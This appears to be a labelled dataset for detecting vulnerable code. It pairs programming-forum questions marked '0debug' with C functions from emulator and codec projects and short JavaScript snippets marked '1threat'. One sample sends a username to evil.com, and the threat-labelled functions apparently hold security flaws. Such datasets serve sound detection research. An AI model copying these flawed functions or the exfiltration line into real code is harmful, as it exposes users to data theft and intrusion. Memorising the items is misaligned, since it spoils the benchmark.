problem
stringlengths
26
131k
labels
class label
2 classes
How to split a string from a vector : <p>My homework is as follows:</p> <p>Step Two - Create a file called connections.txt with a format like:</p> <pre><code>Kelp-SeaUrchins Kelp-SmallFishes </code></pre> <p>Read these names in from a file and split each string into two (org1,org2). Test your work just through prin...
0debug
static int http_receive_data(HTTPContext *c) { int len; HTTPContext *c1; if (c->buffer_ptr >= c->buffer_end) { FFStream *feed = c->stream; if (c->data_count > FFM_PACKET_SIZE) { lseek(c->feed_fd, feed->feed_write_inde...
1threat
how to order by or Sort a int list and select nth element in C# : I have a list and I want to select the fifth highest element from list. List<int> list = new List<int>(); list.Add(2); list.Add(18); list.Add(21); list.Add(10); list.Add(20);...
0debug
Making firebase storage public for reading and writing on android : <p>I am new to firebase storage. Can anyone tell me how to make the storage files public for reading and writing?. The default code provided by firebase is given below. What changes should I make ?</p> <pre><code>service firebase.storage { match /b/...
0debug
Django Convert ID to slug : <p>Im new to django and wanted to <strong>convert id/pk to slug</strong>, I wanted to make <strong>url to be friendly or easy to understand</strong></p> <p>Wanted to make url <code>http://127.0.0.1:8000/1/</code> to <code>http://127.0.0.1:8000/hello/</code></p> <p>Model.py</p> <pre><code...
0debug
How to properly make asynchronous / parallel database calls : <p>I'm looking for the proper way to handle multiple database calls that would likely benefit from running simultaneously. The queries are just to stored procedures that are either doing inserts or merges using data that is programmatically assembled into D...
0debug
I have no idea why this error: "missing 1 required positional argument: 'self'" : <p>This is my code:</p> <pre><code> from tkinter import Tk, Button import GUI root = Tk() b = GUI.time button1 = Button( root, text="Local time", command=b.local_time # text on top of button ) # button click event handler button...
0debug
static void bdrv_delete(BlockDriverState *bs) { assert(!bs->dev); assert(!bs->job); assert(bdrv_op_blocker_is_empty(bs)); assert(!bs->refcnt); assert(QLIST_EMPTY(&bs->dirty_bitmaps)); bdrv_close(bs); bdrv_make_anon(bs); g_free(bs); }
1threat
static void gen_msgsnd(DisasContext *ctx) { #if defined(CONFIG_USER_ONLY) gen_inval_exception(ctx, POWERPC_EXCP_PRIV_OPC); #else if (unlikely(ctx->pr)) { gen_inval_exception(ctx, POWERPC_EXCP_PRIV_OPC); return; } gen_helper_msgsnd(cpu_gpr[rB(ctx->opcode)]); #endif }
1threat
void rgb16tobgr16(const uint8_t *src, uint8_t *dst, unsigned int src_size) { unsigned i; unsigned num_pixels = src_size >> 1; for(i=0; i<num_pixels; i++) { unsigned b,g,r; register uint16_t rgb; rgb = src[2*i]; r = rgb&0x1F; g = (rgb&0x7E0)>>5; b = (rgb&0xF800)>>11; ...
1threat
struct omap_mpu_state_s *omap310_mpu_init(MemoryRegion *system_memory, unsigned long sdram_size, const char *core) { int i; struct omap_mpu_state_s *s = (struct omap_mpu_state_s *) g_malloc0(sizeof(struct omap_mpu_state_s)); qemu_irq dma_irqs[6]; Drive...
1threat
the transfer of the value in a fonction : public boolean judge(Parcelle p) { int xx,yy; int co; for(int aa=0;aa<9;aa++) { for(int bb=0;bb<5;bb++) { if (p.equals(alist.get(aa).get(bb))) { xx=aa; yy=bb; break; } } } ...
0debug
static bool is_zero_cluster(BlockDriverState *bs, int64_t start) { BDRVQcow2State *s = bs->opaque; int nr; BlockDriverState *file; int64_t res = bdrv_get_block_status_above(bs, NULL, start, s->cluster_sectors, &nr, &file); return res >= 0 && ((res...
1threat
static int pcm_decode_frame(AVCodecContext *avctx, void *data, int *data_size, uint8_t *buf, int buf_size) { PCMDecode *s = avctx->priv_data; int n; short *samples; uint8_t *src; samples = data; src = buf; if(buf_size > AV...
1threat
VIOsPAPRDevice *spapr_vty_get_default(VIOsPAPRBus *bus) { VIOsPAPRDevice *sdev, *selected; DeviceState *iter; selected = NULL; QTAILQ_FOREACH(iter, &bus->bus.children, sibling) { if (qdev_get_info(iter) != &spapr_vty_info.qdev) { continue; ...
1threat
alert('Hello ' + user_input);
1threat
Number function in javascript : number function in javascript can be used to multiply,divide,find remainder but cannot be used for subtraction and addition. var theNumber = Number ( prompt (" Pick a number " , "") ) ; alert (" difference " + theNumber - theNumber ) ; // -> difference NaN why...
0debug
Art: Verification of X took Y ms : <p>I've got a warning in my logcat:</p> <pre><code>W/art: Verification of void com.myapp.LoginFragment$override.lambda$logIn$5(com.myapp.LoginFragment, java.lang.Throwable) took 217.578ms </code></pre> <p>Here's the code:</p> <pre><code>subscription = viewModel.logIn() ...
0debug
Why am i getting an error on return sharePreferenceUtils : <p>I cant figure out why it wont let me return sharePreferenceUtils. is there a better way to do this? I get the error "incompatible types" </p> <pre><code> private static String Preference_NAME = "CodeLotto"; private static SharePreferenceUtils sharePr...
0debug
Load route from ios native code (objective c) : I'm integrating an ios native library. The library opens a third party app, this process data and reload my app using deep, the lib catches the response. I wanna load the JS screen component from the native ios code integrated. I tried to use the `RCTLinkingManager` bu...
0debug
IIS Express not stopping when debug session ends : <p>All of a sudden IIS Express no longer stops when I stop debugging a web site in Visual Studio 2017.</p> <p>I'm not sure when this behaviour started, but I have the following setup:</p> <ul> <li>Visual Studio 15.5.2 (Has been repaired)</li> <li>IIS Express 10.0 x64...
0debug
static void qbus_print(Monitor *mon, BusState *bus, int indent) { struct DeviceState *dev; qdev_printf("bus: %s\n", bus->name); indent += 2; qdev_printf("type %s\n", bus_type_names[bus->type]); LIST_FOREACH(dev, &bus->children, sibling) { qdev_print(mon, dev, indent); } }
1threat
Execute selection from script in Vim : <p>I'm trying to incorporate vim into my main workflow. A major sticking point for me has been interactively editing and running programs/scripts.</p> <p>For example given that I'm currently vimmed into test.py</p> <pre><code>print('hello') x = 5 y = x+2 print(y) </code></pre> ...
0debug
static int default_fdset_dup_fd_remove(int dup_fd) { return -1; }
1threat
static int flic_probe(AVProbeData *p) { int magic_number; if (p->buf_size < 6) return 0; magic_number = AV_RL16(&p->buf[4]); if ((magic_number != FLIC_FILE_MAGIC_1) && (magic_number != FLIC_FILE_MAGIC_2) && (magic_number != FLIC_FILE_MAGIC_3)) return 0; ...
1threat
static int openfile(char *name, int flags, int growable) { if (bs) { fprintf(stderr, "file open already, try 'help close'\n"); return 1; } bs = bdrv_new("hda"); if (!bs) return 1; if (bdrv_open(bs, name, flags) == -1) { fprintf(stderr, "%s: can't open device %s\n", progname, name); bs = NU...
1threat
Manually restarting `ng build --watch` or `ng serve` : <p>When we use nodemon, for example, we can manually trigger a rebuild by typing <code>rs</code> to stdin and hitting return/enter.</p> <p>I am wondering if there is a way to manually trigger a rebuild when using <code>ng build --watch</code> or <code>ng serve</co...
0debug
Google maps work locally but not online. : <p>I cannot find out why Google Map works perfectly local but not online. Check it: www.giacomobartoli.xyz at the end of the page.</p> <p>Thanks in advance</p>
0debug
static void gen_dmfc0 (CPUState *env, DisasContext *ctx, int reg, int sel) { const char *rn = "invalid"; if (sel != 0) check_insn(env, ctx, ISA_MIPS64); switch (reg) { case 0: switch (sel) { case 0: gen_op_mfc0_index(); rn = "Index"; ...
1threat
C++ How to delete an array with an int ptr pointing to it : Hi so I have something like: int *p=new int[3]; *p=1; p++; *p=2; delete [] p; Is this the correct way to delete the array that p is pointing to?
0debug
document.location = 'http://evil.com?username=' + user_input;
1threat
static int32_t scsi_disk_emulate_command(SCSIRequest *req, uint8_t *buf) { SCSIDiskReq *r = DO_UPCAST(SCSIDiskReq, req, req); SCSIDiskState *s = DO_UPCAST(SCSIDiskState, qdev, req->dev); uint64_t nb_sectors; uint8_t *outbuf; int buflen; switch (req->cmd.buf[0]) { case INQUIRY: ...
1threat
lousy conversion from float to int.type checking in java : the Java is strong type checked language .the java book i am refer > ***the complete java reference***< says that *numeric types such as integer and float are compatible with each other* while typing the program i encountered a problem lousy conversion ...
0debug
how to continuously sync local data between iphone to iwatch when iPhone app in background mode ? : When iphone app is enter in background mode then ios automatically terminate app after 180 second. If we require to continuously data sync between iphone app to iwatch app. In this situation what can we do? How to co...
0debug
Excel - writing a complex formula : i have a bunch of numbers and i want to write one formula in cell "AJ1" to reach the number "77" (see AJ2 in sample file) Maybe it can be a VB macro to do is, i dont know... [Sample File][1] Thank you for your time & help. [1]: https://drive.google.com/open?id=1783m...
0debug
Java file not showing in android studio : <p>I want to create a new application in android studio, when I open a new project I don't see a Java file like this. the difference between my project and other project <a href="https://imgur.com/a/HDSxYub" rel="nofollow noreferrer">https://imgur.com/a/HDSxYub</a></p>
0debug
static size_t handle_aiocb_ioctl(struct qemu_paiocb *aiocb) { int ret; ret = ioctl(aiocb->aio_fildes, aiocb->aio_ioctl_cmd, aiocb->aio_ioctl_buf); if (ret == -1) return -errno; return aiocb->aio_nbytes; }
1threat
int scsi_build_sense(uint8_t *in_buf, int in_len, uint8_t *buf, int len, bool fixed) { bool fixed_in; SCSISense sense; if (!fixed && len < 8) { return 0; } if (in_len == 0) { sense.key = NO_SENSE; sense.asc = 0; sense.ascq = 0; }...
1threat
even number for both value 1 and value 2 : i'm only getting random even number for value 1 . i need it for both value 1 and 2. Can anyone teach me how to solve it? i'm using threadlocalrandom for it public void setQuestion(){ Random rand = new Random(); int value1 = ThreadLocalRandom.curre...
0debug
int xics_alloc_block(XICSState *icp, int src, int num, bool lsi, bool align) { int i, first = -1; ICSState *ics = &icp->ics[src]; assert(src == 0); if (align) { assert((num == 1) || (num == 2) || (num == 4) || (num == 8) || (num == 16) || (num == 32)); ...
1threat
void *g_malloc0_n(size_t nmemb, size_t size) { size_t sz; void *ptr; __coverity_negative_sink__(nmemb); __coverity_negative_sink__(size); sz = nmemb * size; ptr = __coverity_alloc__(size); __coverity_writeall0__(ptr); __coverity_mark_as_afm_allocated__(ptr, AFM_free); ret...
1threat
Find Text before a Tag : <p>I have a text in a XML File Link Below</p> <pre><code>&lt;p&gt;The artificial and industrial uses &lt;xref&gt;1989&lt;/xref&gt; of microorganisms for material production have a long history of more than a thousand years. Recently, genetic operations have been widely applied to improve produ...
0debug
How to Create Store Procedure? : I have following fields i need TO create table in stored procedure i want set table name dbo.UploadFilesProject and Following Fields @ProjectId (int, Input, No default) @FileName (varchar(75), Input, No default) @FilePath (varchar(500), Input, No default) ...
0debug
Why doesn't gcc resolve _mm256_loadu_pd as single vmovupd? : <p>I'm writing some <em>AVX</em> code and I need to load from potentially unaligned memory. I'm currently loading 4 <em>doubles</em>, hence I would use intrinsic instruction <a href="https://software.intel.com/en-us/node/524102" rel="noreferrer">_mm256_loadu_...
0debug
int ff_thread_ref_frame(ThreadFrame *dst, ThreadFrame *src) { int ret; dst->owner = src->owner; ret = av_frame_ref(dst->f, src->f); if (ret < 0) return ret; av_assert0(!dst->progress); if (src->progress && !(dst->progress = av_buffer_ref(src->progress))) { ...
1threat
int ff_mp4_read_dec_config_descr(AVFormatContext *fc, AVStream *st, AVIOContext *pb) { enum AVCodecID codec_id; unsigned v; int len, tag; int ret; int object_type_id = avio_r8(pb); avio_r8(pb); avio_rb24(pb); v = avio_rb32(pb); #if FF_API_LAVF_AVCTX FF_DISABLE_DEPR...
1threat
Find all HTML tags used on a webpage : <p>I need a list of all HTML-tags used on a specific page.</p> <p>My goal is to get a list like this</p> <pre><code>&lt;a&gt; &lt;p&gt; &lt;em&gt; &lt;body&gt; </code></pre> <p>and so on. I will then paste it into a text editor and remove duplicates and finally process the resu...
0debug
Using %i and %I symbol array literal : <p>Reading through a list of Rails questions, I'm having trouble finding what the %i does in relation to a symbol array. Does this mean anything to anyone?</p>
0debug
android app button thats save the predefined contact to address book : <p>I need to add contact button in app, if user clicks on that a contact is stored in the user address book, with or without prompt.</p> <pre><code>Name:- sharukh khan website:- www.google.com Phone:- 9999999999 Phone:- 8888888888 email:- s@p.c...
0debug
int qemu_sem_timedwait(QemuSemaphore *sem, int ms) { int rc; struct timespec ts; #if defined(__APPLE__) || defined(__NetBSD__) compute_abs_deadline(&ts, ms); pthread_mutex_lock(&sem->lock); --sem->count; while (sem->count < 0) { rc = pthread_cond_timedwait(&sem->cond, &sem->lo...
1threat
static void s390_pcihost_init_as(S390pciState *s) { int i; S390PCIBusDevice *pbdev; for (i = 0; i < PCI_SLOT_MAX; i++) { pbdev = &s->pbdev[i]; memory_region_init(&pbdev->mr, OBJECT(s), "iommu-root-s390", UINT64_MAX); address_space_init(&pbdev->as,...
1threat
<bound method Response.json of <Response [200]>> : <p>I trying to make a request GET to <a href="https://randomuser.me/api/" rel="noreferrer">https://randomuser.me/api/</a></p> <pre><code>import requests import json url = "https://randomuser.me/api/" data = requests.get(url).json print data </code></pre> <hr> <p>...
0debug
static int xen_pt_word_reg_write(XenPCIPassthroughState *s, XenPTReg *cfg_entry, uint16_t *val, uint16_t dev_value, uint16_t valid_mask) { XenPTRegInfo *reg = cfg_entry->reg; uint16_t writable_mask = 0; uint16_t throughable_mask = get_t...
1threat
tune oracle sql query : i want to ask is it better to use Synonym or the actual name for the table to tune the performance of a sql query
0debug
int ff_ac3_bit_alloc_calc_mask(AC3BitAllocParameters *s, int16_t *band_psd, int start, int end, int fast_gain, int is_lfe, int dba_mode, int dba_nsegs, uint8_t *dba_offsets, uint8_t *dba_lengths, uint8_t *dba_values, ...
1threat
VBA Excel to Group data by Name : <p>I'm not sure if this is possible with VBA.</p> <p>I have this Data not in group: <br> <a href="https://i.stack.imgur.com/0YSpI.jpg" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/0YSpI.jpg" alt="Original Excel Table"></a></p> <p>I need it to look like the following ...
0debug
SwiftUI adding custom UIViewControllerTransitioningDelegate : <p>I'm trying to create <code>SwiftUI</code> custom segue animation, like this </p> <p><a href="https://i.stack.imgur.com/RLLSH.gif" rel="noreferrer"><img src="https://i.stack.imgur.com/RLLSH.gif" alt="enter image description here"></a> </p> <p>I try to ch...
0debug
How to handle caching of JavaScript files imported as ES6 module : <h2>Old situation</h2> <p>Previously, I used the following method to force the browser to reload my JavaScript file if there was a new version available.</p> <pre><code>&lt;script src="common.js?version=1337"&gt;&lt;/script&gt; &lt;script src="app.js?...
0debug
void vmstate_save_state(QEMUFile *f, const VMStateDescription *vmsd, void *opaque, QJSON *vmdesc) { VMStateField *field = vmsd->fields; trace_vmstate_save_state_top(vmsd->name); if (vmsd->pre_save) { vmsd->pre_save(opaque); } if (vmdesc) { json_...
1threat
jquery $(this).data selecter : **view** echo '<div class="carousel-inner">'; echo '<div class="item active">'; echo'<h4>' . $vid->VIDEO_NAME . '</h4>'; echo'<input type="text" class="" data-primary="' . $vid->ID . '" value="' . $vid->ID . '">'; echo '<video width="500" height="281" controls>'...
0debug
Install libc++ on ubuntu : <p>I am wondering what is the right/easy way to install a binary libc++ on Ubuntu, in my case Trusty aka 14.04?</p> <p>On the LLVM web site there are apt packages <a href="http://apt.llvm.org/" rel="noreferrer">http://apt.llvm.org/</a> and I have used these to install 3.9. However these pack...
0debug
iscsi_connect_cb(struct iscsi_context *iscsi, int status, void *command_data, void *opaque) { struct IscsiTask *itask = opaque; struct scsi_task *task; if (status != 0) { itask->status = 1; itask->complete = 1; return; } task = iscsi_inquiry_t...
1threat
Center UIView vertically in scroll view when its dynamic Labels are small enough, but align it to the top once they are not : <p>I have a view with 3 dynamic labels inside it and I am trying to find a way to centre it vertically in a scroll view but when its dynamic labels are too large to fit on a page, make the text ...
0debug
rotating two lines around an origin in python : I have two lines which meet around origin z and y, listed below. When I plot these according to certain functions I get the attached plot. <!-- begin snippet: js hide: false console: true babel: false --> <!-- language: lang-html --> origin_z = 260 orig...
0debug
Powershell - switch - multiple variables : I'm trying to create a script which will work assign different IP ranges depending on the choice, currently I've done something like this: # Get DHCP Scope Start - first IP to check - End Last IP to check $X = 0 $Y = 0 $Z = 0 $End = 0 ...
0debug
why else if not working here ? : > When i will getIntent name for particular place my map will focus on that place but its working for only one place why is it so ? here is my code if(restaurant_name != null ) { if (restaurant_name.equals("Fun N Food")) { ...
0debug
Is it possible to animate attribute change using jQuery? : <p>I need to change the "src" attribute of an "img" element after hovering over its parent element.</p> <p>I have this HTML:</p> <pre><code>&lt;div class="thumbnail"&gt; &lt;img src="img/1_thumb.jpg"&gt; &lt;/div&gt; </code></pre> <p>And I need to change...
0debug
static void synthfilt_build_sb_samples (QDM2Context *q, GetBitContext *gb, int length, int sb_min, int sb_max) { int sb, j, k, n, ch, run, channels; int joined_stereo, zero_encoding, chs; int type34_first; float type34_div = 0; float type34_predictor; float samples[10], sign_bits[16]; ...
1threat
void virtio_save(VirtIODevice *vdev, QEMUFile *f) { BusState *qbus = qdev_get_parent_bus(DEVICE(vdev)); VirtioBusClass *k = VIRTIO_BUS_GET_CLASS(qbus); VirtioDeviceClass *vdc = VIRTIO_DEVICE_GET_CLASS(vdev); uint32_t guest_features_lo = (vdev->guest_features & 0xffffffff); int i; if (k-...
1threat
static gboolean fd_chr_read(GIOChannel *chan, GIOCondition cond, void *opaque) { CharDriverState *chr = opaque; FDCharDriver *s = chr->opaque; int len; uint8_t buf[READ_BUF_LEN]; GIOStatus status; gsize bytes_read; len = sizeof(buf); if (len > s->max_size) { len = s->...
1threat
How To Setup Contact Form in Wordpress : I am new to WordPress and PHP. I am creating website and now i want to setup the contact form in it. I just want to set only functionality of contact form...i create a form using bootstrap which i don't want to change it. it is a requirements! So i want to get your help i...
0debug
static void virtio_pci_device_plugged(DeviceState *d) { VirtIOPCIProxy *proxy = VIRTIO_PCI(d); VirtioBusState *bus = &proxy->bus; uint8_t *config; uint32_t size; VirtIODevice *vdev = virtio_bus_get_device(&proxy->bus); config = proxy->pci_dev.config; if (proxy->class_code) { ...
1threat
static TRBCCode xhci_address_slot(XHCIState *xhci, unsigned int slotid, uint64_t pictx, bool bsr) { XHCISlot *slot; USBPort *uport; USBDevice *dev; dma_addr_t ictx, octx, dcbaap; uint64_t poctx; uint32_t ictl_ctx[2]; uint32_t slot_ctx[4]; uint3...
1threat
please help to explain the output of this c program : <p>After executing i am getting the output as 12 6 11. please explain how this is possible</p> <pre><code>#include&lt;stdio.h&gt; #define MAN(x,y) (x)&gt;(y)?(x):(y) int main() { int i = 10,j = 5,k = 0; k = MAN(i++,++j); printf("%d %d %d", i, j, k); ...
0debug
Fastest way to solve the divisibility of numbers : <p>I have a program in which in which 4 numbers are input n,a,b,c</p> <p>how many number exists which are less than or equal to n and are divisible by a ,b or c .</p> <p>Sample input case - 15 2 3 5 output 11</p> <p>Here n = 15 , a= 2, b=3,c = 5 The number which a...
0debug
static int coroutine_fn bdrv_aligned_pwritev(BlockDriverState *bs, BdrvTrackedRequest *req, int64_t offset, unsigned int bytes, QEMUIOVector *qiov, int flags) { BlockDriver *drv = bs->drv; bool waited; int ret; int64_t sector_num = offset >> BDRV_SECTOR_BITS; unsigned int nb_sector...
1threat
static void arm_cpu_initfn(Object *obj) { CPUState *cs = CPU(obj); ARMCPU *cpu = ARM_CPU(obj); static bool inited; cs->env_ptr = &cpu->env; cpu_exec_init(&cpu->env); cpu->cp_regs = g_hash_table_new_full(g_int_hash, g_int_equal, g_free, g_free); ...
1threat
bdrv_acct_done(BlockDriverState *bs, BlockAcctCookie *cookie) { assert(cookie->type < BDRV_MAX_IOTYPE); bs->stats.nr_bytes[cookie->type] += cookie->bytes; bs->stats.nr_ops[cookie->type]++; bs->stats.total_time_ns[cookie->type] += get_clock() - cookie-...
1threat
c++ read files from folder and save it to vector of strings : I am trying to read textfiles from an folder and save the names to a vector of strings. This is my code by now. I can compile and run it, but it is not saving my files to the vector. int main(){ Data Dataset; WIN32_FIND_DATA FindFileData; HAN...
0debug
Android Instant App : Default Activity not found : <p>This seems to be manifest merging error. I'm trying to port existing code to instant app module. What I've tried is :</p> <ol> <li>Changed main app module to baseFeatureModule. </li> <li>Created a new module completeApp.</li> <li><p>Emptied completeAppModule's Mani...
0debug
void ff_biweight_h264_pixels4_8_msa(uint8_t *dst, uint8_t *src, int stride, int height, int log2_denom, int weight_dst, int weight_src, int offset) { avc_biwgt_4width_msa(src, stride, ...
1threat
static int milkymist_softusb_init(SysBusDevice *dev) { MilkymistSoftUsbState *s = MILKYMIST_SOFTUSB(dev); sysbus_init_irq(dev, &s->irq); memory_region_init_io(&s->regs_region, OBJECT(s), &softusb_mmio_ops, s, "milkymist-softusb", R_MAX * 4); sysbus_init_mmio(dev, &s->...
1threat
Module compiled with Swift 2.3 cannot be imported in Swift 3.0 : <p>i add Facebook SDK (Swift) to my project. And now i update Xcode 8 and Swift 3. I have error in build time </p> <pre><code>Module compiled with Swift 2.3 cannot be imported in Swift 3.0 </code></pre> <p>It is very strange that is not supported. Has ...
0debug
C- how to read input from stdin until newline character using read()? : <p>Basically I want to use the read() function to read in a typed message from STDIN, but I want to quit the message by typing just the enter key instead of using CTRL + D. What's the best way to do this? </p>
0debug
Exception occurs when trying to deserialize using Json.Net : <p>I am trying to deserialize the following json using Json.Net into C# classes as defined below. I am having this exception:</p> <blockquote> <p>Newtonsoft.Json.JsonSerializationException: 'Could not create an instance of type Viewer.ShapeDto. Type is a...
0debug
what does x = tf.placeholder(tf.float32, [None, 784]) means? : <p>I know basic use for tf.placeholder:</p> <pre><code>x = tf.placeholder(tf.float32, shape=(1024, 1024)) y = tf.matmul(x, x) with tf.Session() as sess: print(sess.run(y)) # ERROR: will fail because x was not fed. rand_array = np.random.rand(1024,...
0debug
php : replicate the excel price() function in php : <p>I have really been struggling replicating the excel price() function in php.</p> <p>Has anyone had any experience doing this before? or is it available in phpexcel?</p>
0debug
def check_monthnumb(monthname2): if(monthname2=="January" or monthname2=="March"or monthname2=="May" or monthname2=="July" or monthname2=="Augest" or monthname2=="October" or monthname2=="December"): return True else: return False
0debug
replace link url in body of e-mail sending per application java : I have application send e-mail to customer and I use **javax.mail.Transport** Class to do this. I want include an URL link in body of e-mail but I prefer mask the link with sentence for example "click here" instead of "https://link.com" . can any one ...
0debug
how to to change value every looop : How to loop and change everytime value example run for loop 7 times for inserting day names to database for ($t = 0 ; $t < 7 $t++){ $defaultValues = "INSERT INTO workingDays (bussinessID, day, workingHours) VALUES (?,?,?)"; $pdo->prepare($defaultValues)->...
0debug
void s390x_cpu_debug_excp_handler(CPUState *cs) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; CPUWatchpoint *wp_hit = cs->watchpoint_hit; if (wp_hit && wp_hit->flags & BP_CPU) { cs->watchpoint_hit = NULL; env->per_address = env->psw.addr; ...
1threat
How do I create an observable of an array from an array of observables? : <p>I have an array of <code>Thing</code> objects that I want to convert to <code>ConvertedThing</code> objects, using an asynchronous function that returns <code>Observable&lt;ConvertedThing&gt;</code>.</p> <p>I'd like to create an <code>Observa...
0debug
JAVA Code snippet: Output Explanation : Need Explanation of this Code : public static void main(String[] args) { <p> int a=010; <p> int b=07; <p> System.out.println(a); <p> System.out.println(b); <p> } <p> **OutPut** : <p> 8 <p> 7
0debug
Push Notifications not being received on iOS 10, but working on iOS 9 and before : <p>I have several apps that were written in Swift 2.2, compiled with Xcode 7.3 and is live on the App Store. The apps utilize Push Notifications and is working fine in iOS 9.3 and earlier.</p> <p>On devices that have been upgraded to iO...
0debug
how to copy file fron one location to another location using java in dynamically : we are trying to copy one file to another location. But we succeed all files move to one location to another but i want to copy only particular file into one location to anothier location. <!-- begin snippet: js hide: false console: t...
0debug
static int hls_read(URLContext *h, uint8_t *buf, int size) { HLSContext *s = h->priv_data; const char *url; int ret; int64_t reload_interval; start: if (s->seg_hd) { ret = ffurl_read(s->seg_hd, buf, size); if (ret > 0) return ret; } if (s->seg_hd) { ...
1threat
Flutter Outline View - "Nothing to show" : <p>Hi has anyone already tried the new "Flutter Outline"-View? </p> <p>I only see "Nothing to show" what I do wrong? Has anyone an idea?</p> <p><a href="https://i.stack.imgur.com/lMidQ.png" rel="noreferrer"><img src="https://i.stack.imgur.com/lMidQ.png" alt="enter image desc...
0debug
Program won't run? : <p>I am trying to make this program work, with no success. The program involves arithmetic with float types, and consists of the function temperature(), to convert Fahrenheit to Celsius. The function gets the input from a <code>for</code> loop, but when I execute it, I only get the first conversion...
0debug
Folder in .gitignore is still in repo : <p>I have added a folder in my .gitignore file. But when I pushed to the repo it was still being pushed. my folder structure is:</p> <pre><code>UI/node_modules </code></pre> <p>In the .gitignore I have added the following:</p> <pre><code>/UI/node_modules /UI/bin </code></pre> ...
0debug
static int spapr_msicfg_find(sPAPRPHBState *phb, uint32_t config_addr, bool alloc_new) { int i; for (i = 0; i < SPAPR_MSIX_MAX_DEVS; ++i) { if (!phb->msi_table[i].nvec) { break; } if (phb->msi_table[i].config_addr == config_addr) { ...
1threat